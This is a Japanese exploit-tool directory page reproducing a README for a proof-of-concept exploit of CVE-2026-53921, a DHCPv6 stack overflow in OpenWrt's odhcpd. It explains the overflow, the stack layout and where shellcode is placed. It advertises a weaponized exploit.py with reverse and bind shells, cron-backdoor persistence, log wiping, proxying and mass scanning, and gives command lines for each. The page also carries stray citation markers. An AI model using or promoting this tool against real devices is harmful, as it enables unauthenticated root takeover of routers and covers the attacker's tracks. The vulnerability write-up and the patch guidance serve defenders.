Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – odhcpd スタックオーバーフロー (CVSS 9.8) 🛡️ OpenWrt DHCPv6 RCE向けの詳細かつ包括的な脆弱性Write-Upと検証ツール & マルチエクスプロイト。デュアルベクター (IA_NA/IA_PD) オーバーフローを備え、MIPS/ARMシェルコード、ROPチェーン、SOCKS5プロキシ、永続化、ログ消去、大規模スキャンに対応。倫理的に使用し、法的に遵守してください。 🔒 | Kitploit
ツール/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
組み込みシステムセキュリティ偵察エクスプロイトフレームワークIoTセキュリティ脆弱性分析エクスプロイトポストエクスプロイトレッドチーミングシェルコード生成

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ペイロード開発
バイナリエクスプロイト
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

CVE-2026-53921 – odhcpd スタックオーバーフロー (CVSS 9.8) 🛡️ OpenWrt DHCPv6 RCE向けの詳細かつ包括的な脆弱性Write-Upと検証ツール & マルチエクスプロイト。デュアルベクター (IA_NA/IA_PD) オーバーフローを備え、MIPS/ARMシェルコード、ROPチェーン、SOCKS5プロキシ、永続化、ログ消去、大規模スキャンに対応。倫理的に使用し、法的に遵守してください。 🔒

リポジトリを見る
622日前未レビュー

CVE-2026-53921

CVE-2026-53921 – odhcpd スタックオーバーフロー

CVE CVSS OpenWrt

⚠️ 教育および許可されたテスト目的のみ。無許可での使用は違法です。


📖 脆弱性概要

CVE-2026-53921 は、OpenWrt の odhcpd デーモン(既定の DHCPv6/DHCPv4/RA サーバー)における深刻なスタックバッファオーバーフローです。

🔍 動作の仕組み

この脆弱性は odhcpd の DHCPv6 メッセージ処理コード、具体的には build_ia() 関数と dhcpv6_ia_handle_IAs() 関数に存在します。

技術的詳細

1. 根本原因

このバグは、DHCPv6 Reply パケットのシリアライズ(パッキング)中に発生します。odhcpd はクライアントの要求に応答する際、適切な境界チェックを行わずに、512バイトの固定サイズのスタックバッファに応答を構築します。

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. オーバーフローのトリガー

攻撃者は、以下の要素を含む DHCPv6 Request(または Solicit)を送信します:

  • 5つ以上の IA_NA(Identity Association for Non-temporary Address)オプション。それぞれに IAAddress サブオプションが含まれます。
  • 22個以上の IA_PD(Identity Association for Prefix Delegation)オプション。

各オプションは odhcpd が Reply を構築する際にスタック領域を消費します。蓄積されたデータが 512バイト を超えると、オーバーフローが発生します。

3. 2つのオーバーフローベクター


ベクター トリガー オーバーフローポイント


サイト1 5つの IA_NA オプション IA_NA 用の build_ia() (IPv6 アドレスを含む)

サイト2 22個の IA_PD オプション IA_PD 用の build_ia()

根本原因は同一ですが、オーバーフローは異なるコードパスで発生するため、両方のベクターが同等に悪用可能です。

4. メモリレイアウト

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

攻撃者は保存されたリターンアドレスを上書きし、メモリ内のシェルコードを指すようにします。

5. 悪用の要件


要件 説明


ネットワークアクセス 攻撃者はターゲットへの IPv6 接続性が 必要

認証 不要 -- 認証なしの攻撃

権限 odhcpd は root で実行されるため、 RCE によりシステム全体を制御可能

ターゲットサービス UDP ポート 547(DHCPv6)が開放されて いる必要がある

6. シェルコードの配置

実際のエクスプロイトでは、攻撃者のシェルコードは IAAddress の IPv6 アドレスフィールド(IA_NA ごとに16バイト)に配置されます。細工されたパケットは、シェルコード、NOPスレッド、リターンアドレスをこれらのフィールドに詰め込みます。

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. 影響の連鎖

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. 攻撃ベクターと対策状況

バージョン ステータス RCE 可能?


odhcpd < e432dd6 影響あり ✅ 可能 OpenWrt < 24.10.8 影響あり ✅ 可能 OpenWrt < 25.12.5 影響あり ✅ 可能 OpenWrt 24.10.8+ 修正済み ❌ 不可能 OpenWrt 25.12.5+ 修正済み ❌ 不可能 odhcpd master + e432dd6 修正済み ❌ 不可能

9. 実世界での悪用

この脆弱性が特に危険な理由は次のとおりです:

  • odhcpd は OpenWrt のインストールでデフォルトで有効になっています。
  • 認証は不要です---同じ IPv6 セグメント上の任意のデバイスから攻撃できます。
  • バグはリクエスト処理パスにあります。
  • 組み込みの MIPS/ARM デバイスにはスタックカナリアや ASLR がほとんど実装されていません。
  • 多くの組み込み環境では、エクスプロイトが一般的な防御を回避できます。

🎯 影響を受けるバージョン

コンポーネント影響を受けるバージョン修正バージョン
odhcpd(master ブランチ)コミット e432dd6 より前e432dd6 以降
OpenWrt リリース< 24.10.8 < 25.12.5

🧰 ツール

このリポジトリは2つの独立したスクリプトを提供します:

スクリプト目的エクスプロイトコード安全性
verifier.py非侵襲的な脆弱性チェック❌ なし✅ 安全
exploit.py完全な武器化エクスプロイト✅ あり⚠️ 危険

🔎 verifier.py – 脆弱性チェッカー

  • 標準の DHCPv6 Solicit を送信して、サービスが稼働しているかどうかを確認します。
  • HTTP/SSH バナーを読み取って OpenWrt のバージョンを検出します。
  • バージョンを既知の脆弱な範囲と比較します。
  • オーバーフローペイロードやシェルコードは送信しません。

💥 exploit.py – 完全版エクスプロイト

  • デュアルオーバーフローベクター:IA_NA(サイト1)および IA_PD(サイト2)。
  • アーキテクチャの自動検出(MIPS / ARM)。
  • MIPS ビッグエンディアンのリバース&バインドシェルコード。
  • SOCKS5 プロキシのサポート。
  • 永続化(cron バックドア)およびログ消去。
  • スレッド式スキャン&大量悪用。
  • オプションのペイロードエンコーディング(XOR)。

🚀 インストール

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 使用方法

🔍 ベリファイア – ターゲットが脆弱かどうかを確認する

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 エクスプロイト – リバースシェルを取得(違法行為には使用しないでください。テスト用のみ)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ コマンドラインオプション

verifier.py

引数説明
-u, --targetターゲット IPv6 アドレス(必須)
-i, --ifaceネットワークインターフェース(デフォルト: eth0)

exploit.py

🧪 使用例

1. ターゲットのリストをスキャンする

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Exploit a single target with bind shell
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. Use SOCKS5 proxy + persistence + log wiping
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ 対策

OpenWrt を 24.10.8 または 25.12.5 以降にアップグレードしてください。

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 参考文献

公式ソース

  • OpenWrt セキュリティアドバイザリ(GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 odhcpd の両方のオーバーフローベクターを網羅する詳細なアドバイザリ。

  • CVE-2026-53921 NVD エントリ https://nvd.nist.gov/vuln/detail/CVE-2026-53921 NIST 脆弱性データベースの公式エントリ。

  • OpenWrt 24.10.8 リリースノート https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 24.10 ブランチの公式リリース発表。

  • OpenWrt 25.12.5 リリースノート https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html 25.12 ブランチの公式リリース発表。

同じリリースで修正された関連 CVE

24.10.8 および 25.12.5 リリースでは、CVE-2026-53921 以外にも複数の odhcpd 脆弱性が修正されています [citation:9]:

技術分析と解説記事

  • The Hacker News の分析 https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html 脆弱性と悪用ベクターの詳細な技術解説。 [citation:1]

  • GitHub PoC リポジトリ https://github.com/0xBlackash/CVE-2026-53921 公開された概念実証(PoC)実装と技術的詳細。 [citation:3]

25.12.5 の追加のセキュリティ修正

バージョン 25.12.5 では、他のコアコンポーネントの脆弱性も修正されています [citation:10]:

  • uhttpd: HTTP リクエストスマグリング(CVE-2026-55612、CVE-2026-55614)
  • LuCI: 複数の権限昇格および XSS の脆弱性
  • cgi-io: 認証済みパストラバーサル
  • Linux Kernel: 複数の CVE に対応した 6.12.94 へ更新
  • OpenSSL: 多数の CVE を解決する 3.5.7 へ更新
  • Dropbear SSH: CVE-2019-6111 および CVE-2026-35385 を修正

関連ドキュメント

  • OpenWrt ファームウェアセレクター https://firmware-selector.openwrt.org/ お使いのデバイス向けの修正済みファームウェアイメージをダウンロードできます。

  • CISA 既知の悪用済み脆弱性カタログ https://www.cisa.gov/known-exploited-vulnerabilities-catalog CVE-2026-53921 が KEV に追加されているかどうかを確認(2026年7月27日時点では未掲載)。 [citation:1]

ツールをダウンロード

24.10.8 & 25.12.5
引数説明
-u, --targetターゲット IPv6 アドレス
-l, --listターゲットのリストを含むファイル
-i, --ifaceネットワークインターフェース(デフォルト: eth0)
--lhostリスナー IP(必須)
--lportリスナーポート(デフォルト: 4444)
--vectorsite1、site2、または both(デフォルト: both)
--offsetスタックオフセット(デフォルト: 512)
--ret16進数のリターンアドレス(例: 0x7ffff000)
--archmips または arm を強制指定(省略時は自動検出)
--payloadreverse または bind(デフォルト: reverse)
--encodenone または xor(デフォルト: none)
--proxy-hostSOCKS5 プロキシ IP
--proxy-portSOCKS5 プロキシポート(デフォルト: 1080)
--persistencecron バックドアをインストール
--clear-logs悪用後に syslog を消去
--scan-onlyターゲットのスキャンのみ行い、悪用しない
--threadsスキャン用のスレッド数(デフォルト: 5)
--verbose詳細ログ出力
CVE ID深刻度説明
CVE-2026-53918高DHCPv6 IA ハンドラーにおける use-after-free [citation:4][citation:9]
CVE-2026-53920高切り詰められた DHCPv6 IA_NA/IA_PD オプションによるスタックメモリの情報漏えい [citation:9]
CVE-2026-53922中size_t アンダーフローによる認証前のサービス拒否(DoS)[citation:9]
CVE-2026-55606中DUID 長のエンディアン不一致によるスタックバッファのオーバーリード [citation:9]
CVE-2026-62948-保存型 XSS につながる DHCPv6 ホスト名インジェクション [citation:1]
CVE-2026-62947-cgi-io における認証済みパストラバーサル [citation:1]